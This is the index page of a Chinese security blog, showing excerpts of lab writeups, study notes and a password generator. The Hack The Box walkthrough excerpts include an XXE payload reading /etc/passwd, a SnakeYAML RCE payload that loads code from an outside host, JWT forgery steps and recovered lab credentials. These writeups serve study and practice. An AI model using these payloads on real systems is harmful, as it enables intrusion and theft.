TypechoJoeTheme

IT小子G4br1el-专注于网络安全研究

登录
用户名
密码

(点选此处产生新验证码)


2022-01-03

软件测试总复习笔记

软件测试总复习笔记
第一章 软件测试概述软件缺陷的故障案例:狮子王游戏BUG(兼容性)、美国航天局登陆事故(集成测试、衔接问题)、跨世纪千年虫(软件设计缺陷)、爱国者导弹防御系统失效(系统时钟误差积累)软件缺陷定义:软件未达到产品说明书中已经标明的功能;软件出现了产品说明书中指明不会出现的错误;软件功能超出了产品说明书中指明的范围;软件未达到产品说明书中虽未指出但应当达到的目标;软件测试人员认为软件难以理解、不易使用,或者从测试员角度看,最终用户认为该软件使用效果不良。软件缺陷成本最高的是发布阶段。软件缺陷原因:复杂性(功能复杂,代码量大,结构复杂,平台复杂)、需求分析问题(不同行业、不同人群)、团队合作问题(沟通不通畅、开发人员水平参差不齐)..............产生的原因:(需求分析阶段最多)软件质量模型:软件测试的定义为:软件测试是贯穿整个软件开发生命周期,验证软件是否满足用户需求的活动,测试的目的是为了发现错误以及避免这些错误的发生,并保证软件的质量。软件测试的目的:以较少的时间和人力找出软件中的各种错误和缺陷;确保软件的功能和性能符合用户的需求并尽可能多的问题在发布或者交付前发现并改...
G4br1el
2022-01-03

计算机科学与技术

68 阅读
0 评论
2022年01月03日
68 阅读
0 评论
2021-11-30

通过恶意PDF执行xss漏洞(修复方法)

通过恶意PDF执行xss漏洞(修复方法)
漏洞复现文章发布于我所创建的团队社区,感谢利刃信安对本社区的大力支持!感谢Mannix师傅帮我们社区找到漏洞!为了方便学习,因此记录一下漏洞修复漏洞修复方案浏览器针对txt/pdf等文件一般是直接打开,从而导致恶意的文件会被浏览器直接执行,因此解决方法就是告诉浏览器哪些类型的文件需要下载而不是直接打开.我们可以在nginx解析容器中通过反向代理可以直接过滤访问的url在指定的访问中添加header.location /{ if ($request_filename ~* ^.*?.(txt|doc|pdf|rar|gz|zip|docx|exe|xlsx|ppt|pptx)$){ add_header Content-Disposition attachment; } }
G4br1el
2021-11-30

渗透测试

196 阅读
1 评论
2021年11月30日
196 阅读
1 评论
2021-11-27

一次xiuno bbs中的BUG带来的修复思考

一次xiuno bbs中的BUG带来的修复思考
前言我一直想搭建一个轻论坛,给想学习安全的师傅提供一个学习交流的简洁平台.偶然间我选中了xiuno bbs,看起来还不错,虽然官方已经不更新了,但是有师傅对官方版本进行了二开,所以这次的文章以版本号为xiuno V5.0.0 二开正式版 为例.BUG出现的原因xiuno bbs对站点访问限制如下.因为我不是特别喜欢白嫖的师傅,所以我想让用户在游客状态下无论访问什么页面都会先跳转到登录页面.代码修改处:/model/misc.func.php,在差不多70行附近,检测站点的运行级别当访问限制为会员可读写时候:case 3: $gid == 0 AND message(-1, lang('runlevel_reson_3')); break; //gid==0表示用户组是游客.当用户组是游客并且页面显示信息为:会员可读写. //本身权限没问题的,但是在注册和找回密码情况下,进行邮箱验证时,不能正常验证,都是提示会员可读写,这就影响到正常业务了当访问限制为所有人可读写的时候代码直接break,导致能正常显示主页,然后百度搜索时候找到了一篇文章:教你用一行代码制作一个可DIY设定信息的《...
G4br1el
2021-11-27

安全技术

145 阅读
0 评论
2021年11月27日
145 阅读
0 评论
2021-11-01

【渗透测试】 hackthebox靶场之BountyHunter

【渗透测试】 hackthebox靶场之BountyHunter
0x01 信息收集已知IP地址为10.10.11.100,开始进行端口扫描nmap -sS -Pn -A -T4 10.10.11.100扫描到22和80端口,可知是SSH和HTTP的web服务,我们访问web站点可知是一个类似赏金猎人的页面。也提示了可以使用burp抓包。随便点一点,看到主页上有一些表单,输入任意字符提交时候burp抓包没有显示数据,说明是个空壳。最后来到了一个提交页面0x02 web渗透随便输入字符,使用burp抓包查看响应包可以看到提交的数据经过base64解码是个XML代码,可以试试存不存在XXE实体注入漏洞。可以尝试构造payload。<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE data [ <!ENTITY file SYSTEM "file:///etc/passwd"> ]> <bugreport> <title>test</title> <cwe...
G4br1el
2021-11-01

渗透测试

146 阅读
0 评论
2021年11月01日
146 阅读
0 评论
2021-10-14

【编程语言】python编写随机密码生成器并编译成EXE

【编程语言】python编写随机密码生成器并编译成EXE
主要功能1、随机密码生成,用于注册网站时使用一次性密码增强安全性。2、密码采用字母大小写加数字混合排列3、可自动生成10个8位数的随机密码,也可以自定义生成几个几位数的随机密码4、代码方面:除了基本功能实现,还加了抛出异常进行处理以及对用户输入的限制代码分享# -*-coding:utf-8 -*- # @Author:G4br1el # @Time:2021/10/14 17:00 # @File:随机密码生成器.py # @software:PyCharm import random import string import sys letter = string.digits + string.ascii_letters key = [] print("-----------------------------------------------------------") print("欢迎使用随机密码生成器,作者:G4br1el,微信号:G4br1elsec") print("--------------------...
G4br1el
2021-10-14

python语言

145 阅读
0 评论
2021年10月14日
145 阅读
0 评论
2021-10-04

【渗透测试】hackthebox靶场之Explore

【渗透测试】hackthebox靶场之Explore
0x01 信息收集端口扫描:nmap -sV -Pn 10.10.10.247扫描出2222端口SSH服务,5555端口也不知道什么服务,感觉这次不一样,端口太少,这次准备深入全端口扫描一下看到开放了38291和59777端口和42135端口(一开始全端口没扫出来,可以再次扫一遍)看到42135是ES file Explorer服务,可以星轨武器漏洞库,搜索到可以用任意文件读取漏洞(CVE-2019-6447),exp还不能直接复制使用,需要用HTML实体解码才可以使用。0x02 漏洞利用通过这个exp,我们可以列出图片所有路径:python3 exp.py listPics 10.10.10.247然后浏览器访问59777端口去访问这些图片,最终看到了creds.jpg是一个账号密码kristiKr1sT!5h@Rp3xPl0r3!估计是SSH的账号,通过扫描的2222端口去登录上SSH在sdcard找到user.txt中的flag:f32017174c7c7e8f50c6da52891ae2500x03 提权因为涉及安卓的adb工具,先下载adb工具:apt-get inst...
G4br1el
2021-10-04

渗透测试

136 阅读
0 评论
2021年10月04日
136 阅读
0 评论
2021-10-01

【渗透测试】hackthebox靶场之CAP

【渗透测试】hackthebox靶场之CAP
0x01 信息收集首先目标地址为10.10.10.245,首先端口扫描一波nmap -sS -A 10.10.10.245扫描到22、80端口然后访问80web服务0x02 web渗透点击左侧菜单栏,点击security这一行,跳转到/data/9页面,发现有个下载按钮,点击后火狐浏览器弹出来的竟然是pcap的数据包打开后竟然是空的然后重新点击菜单,发现/data/目录后面的数字会跟随点击次数+1,何不让数字改成0呢,然后下载后果然有数据。通过分析数据包,发现有个FTP协议的数据,追踪TCP流发现有个FTP的账号密码。 USER nathan PASS Buck3tH4TF0RM3!接着直接就连接上ftp看到user.txt,但是cat不出来,然后直接换浏览器连接user flag:6ede8c54054a876d8c2965c261f5525e0x03 提权在FTP的时候发现还有个py的脚本,下载后发现是uid提权的脚本接下来就是运行脚本,怎么运行呢?不是开放了22端口嘛,看看原来的FTP账号可不可以登录还真可以,然后python3运行然后提权到root用户,然后按照靶场惯例,...
G4br1el
2021-10-01

渗透测试

147 阅读
0 评论
2021年10月01日
147 阅读
0 评论
2021-08-08

【红蓝攻防】ATT&CK红队评估实战靶场1

【红蓝攻防】ATT&CK红队评估实战靶场1
0x00 网络拓扑及环境部署攻击机:kali linux ,vmnet模式,ip:192.168.54.128web服务器:win7,双网卡,vmnet1和vmnet2,内网ip:192.168.52.143,外网ip:192.168.54.129域成员主机:win2k3,vmnet2,ip:192.168.52.141内网域控主机:winserver 2008 r2,vmnet2 ,IP:192.168.52.138备注:WIN7手动开启phpstudy。建议大家按照官方下载地址页面下面的截图去配置靶场的IP,我当时配置了差不多一天了都(尤其是win7的配置容易错)。0x01 信息收集使用nmap探测内网主机地址nmap -sV -sS -A 192.168.54.0/24发现192.168.54.129为存活主机并发现开放了80web服务端口以及3306mysql数据库端口,访问80端口显示phpstudy探针。通过信息收集,我们拿到了管理员邮箱、服务器主机名、服务器指纹(PHP版本号、apache容器)同时还发现数据库连接检测,使用最简单的弱口令测试:root/root,...
G4br1el
2021-08-08

红蓝攻防

154 阅读
0 评论
2021年08月08日
154 阅读
0 评论
2021-06-06

【渗透测试】hackthebox靶场之TheNotebook

【渗透测试】hackthebox靶场之TheNotebook
0x01 信息收集端口扫描:nmap -A -sS -T4 -sC 10.10.10.230已知开放22、10010看起来像api接口、80web服务(nginx)。然后浏览器访问80端口。看起来是个写笔记的页面,我们先注册一个账户试试0x02 web渗透注册登录以后发现能利用的功能太少了,只有发布笔记的功能,一个标题栏和正文栏我首先用F12查看了页面登录的身份验证部分,在查看cookies的时候发现它是使用JWT的认证令牌,原理参考:什么是JWT?详细讲解。解码后发现有一个kid参数指向了带有私钥的内部地址,用于对令牌的签名攻击思路:我们可以使用自己生成的私钥对JWT令牌签名,修改有效的payload将普通用户权限设置为管理员权限。首先通过openssl生成一个RSA私钥openssl genrsa -out privKey.key 1024 cat privkey.key我们创建一个python脚本(jwt-token.py),通过我的RSA私钥生成一个自定义的JWT令牌,并将当前用户设置为管理员。注意:没有jwt库的先要装个jwt库,还有就是py脚本文件名格式要xxx-xx...
G4br1el
2021-06-06

渗透测试

203 阅读
0 评论
2021年06月06日
203 阅读
0 评论
2021-06-04

【渗透测试】hackthebox靶场之Ophiuchi

【渗透测试】hackthebox靶场之Ophiuchi
0x01 端口扫描端口扫描:nmap -A -sS -sV -sC -T4 10.10.10.227其中开放了22和8080端口,使用apache tomcat服务。浏览器访问一下8080端口是一个YAML在线校验页面,随便输入一个数据以后,显示“由于安全原因,此功能已暂时搁置。我们很快就会解决这个问题!”我们输入错误的YAML数据会出现500错误0x02 RCE漏洞复现我们可以试着寻找一些已知的YAML漏洞,经过搜索引擎搜索后,我们找到一个YAML Parser 的RCE漏洞:SnakeYaml Deserilization exploited为了验证此RCE漏洞是否存在,我们进行漏洞验证,首先我们用python启动HTTP服务监听80端口,然后在YAML校验页面输入payload:!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://10.10.14.17/"] ]] ] 我们服务器收到了80端口请求,说明存在此漏洞。然后我...
G4br1el
2021-06-04

渗透测试

320 阅读
0 评论
2021年06月04日
320 阅读
0 评论